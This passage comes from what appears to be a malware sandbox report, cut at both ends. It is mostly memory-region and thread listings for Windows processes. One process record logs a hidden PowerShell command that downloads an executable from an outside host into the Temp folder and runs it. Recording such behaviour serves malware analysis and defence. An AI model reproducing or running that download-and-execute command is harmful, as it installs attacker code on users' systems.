0x6e2d0000 end_va 
= 0x6e2d7fff entry_point = 0x6e2d0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 602 start_va = 0x6e370000 end_va = 0x6e37cfff entry_point = 0x6e370000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 603 start_va = 0x6e380000 end_va = 0x6e382fff entry_point = 0x6e380000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 604 start_va = 0x6e390000 end_va = 0x6e41ffff entry_point = 0x6e390000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 605 start_va = 0x6e870000 end_va = 0x6e881fff entry_point = 0x6e870000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 606 start_va = 0x6eb80000 end_va = 0x6ebe0fff entry_point = 0x6eb80000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 607 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 608 start_va = 0x6f530000 end_va = 0x6f589fff entry_point = 0x6f530000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 609 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id 
= 610 start_va = 0x716a0000 end_va = 0x716eefff entry_point = 0x716a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 611 start_va = 0x716f0000 end_va = 0x71747fff entry_point = 0x716f0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 612 start_va = 0x71950000 end_va = 0x71964fff entry_point = 0x71950000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 613 start_va = 0x71df0000 end_va = 0x71e01fff entry_point = 0x71df0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 614 start_va = 0x71f30000 end_va = 0x71f79fff entry_point = 0x71f30000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 615 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 616 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 617 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 618 start_va = 0x73390000 end_va = 0x73397fff entry_point = 0x73390000 region_type = mapped_file name = "nsisvc.dll" filename = 
"\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 619 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 620 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 621 start_va = 0x73410000 end_va = 0x73456fff entry_point = 0x73410000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 622 start_va = 0x73470000 end_va = 0x73478fff entry_point = 0x73470000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 623 start_va = 0x734e0000 end_va = 0x734effff entry_point = 0x734e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 624 start_va = 0x73a50000 end_va = 0x73a57fff entry_point = 0x73a50000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 625 start_va = 0x73a60000 end_va = 0x73a71fff entry_point = 0x73a60000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 626 start_va = 0x73a90000 end_va = 0x73a9ffff entry_point = 0x73a90000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 627 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name 
= "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 628 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 629 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 630 start_va = 0x74730000 end_va = 0x74745fff entry_point = 0x74730000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 631 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 632 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 633 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 634 start_va = 0x749c0000 end_va = 0x749e1fff entry_point = 0x749c0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 635 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 636 start_va = 0x74b20000 end_va = 0x74b25fff entry_point 
= 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 637 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 638 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 639 start_va = 0x74d80000 end_va = 0x74d90fff entry_point = 0x74d80000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 640 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 641 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 642 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 643 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 644 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 
645 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 646 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 647 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 648 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 649 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 650 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 651 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 652 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 653 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 654 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 655 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 656 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 657 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 658 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 659 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 660 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 661 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 662 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = 
"\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 663 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 664 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 665 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 666 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 667 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 668 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 669 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 670 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 671 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 673 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 
674 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 675 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 676 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 677 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 678 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 679 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 680 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 681 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 682 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 683 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 695 start_va = 0x1520000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 696 start_va = 0x722f0000 end_va = 0x7231dfff entry_point = 0x722f0000 region_type = mapped_file name = "fthsvc.dll" filename = "\\Windows\\System32\\fthsvc.dll" (normalized: "c:\\windows\\system32\\fthsvc.dll") Region: id = 697 start_va = 0x74d30000 end_va = 0x74d71fff entry_point = 0x74d30000 region_type = mapped_file name = "wevtapi.dll" filename = 
"\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 698 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 27 os_tid = 0x328 Thread: id = 28 os_tid = 0x6d4 Thread: id = 29 os_tid = 0x12c Thread: id = 30 os_tid = 0x11c Thread: id = 31 os_tid = 0x7dc Thread: id = 32 os_tid = 0x7c8 Thread: id = 33 os_tid = 0x784 Thread: id = 34 os_tid = 0x780 Thread: id = 35 os_tid = 0x5ec Thread: id = 36 os_tid = 0x588 Thread: id = 37 os_tid = 0x420 Thread: id = 38 os_tid = 0x41c Thread: id = 39 os_tid = 0x414 Thread: id = 40 os_tid = 0x40c Thread: id = 41 os_tid = 0x3f8 Thread: id = 42 os_tid = 0xa78 Thread: id = 43 os_tid = 0xa7c Thread: id = 44 os_tid = 0xa80 Thread: id = 49 os_tid = 0xb08 Process: id = "5" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x7f1e6680" os_pid = "0xb44" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 794 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 795 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 796 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 797 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 798 start_va = 0x22020000 end_va = 0x22091fff entry_point = 0x22020000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 799 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 800 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 801 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 802 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 803 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 808 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 809 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename 
= "" Region: id = 810 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 811 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 812 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 813 start_va = 0x6e980000 end_va = 0x6e9c9fff entry_point = 0x6e980000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 814 start_va = 0x73490000 end_va = 0x734a3fff entry_point = 0x73490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 815 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 816 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 817 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 818 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 819 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = 
"lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 820 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 821 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 822 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 823 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 824 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 825 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 826 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 827 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 828 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 829 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 830 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 831 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 832 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 833 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 834 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 835 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 836 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 837 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 838 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 839 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000005c0000" filename = "" Region: id = 840 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 841 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 842 start_va = 0x1310000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 843 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 844 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 845 start_va = 0x4d0000 end_va = 0x5aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 846 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 847 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 848 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 849 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 850 start_va = 0x750a0000 end_va = 
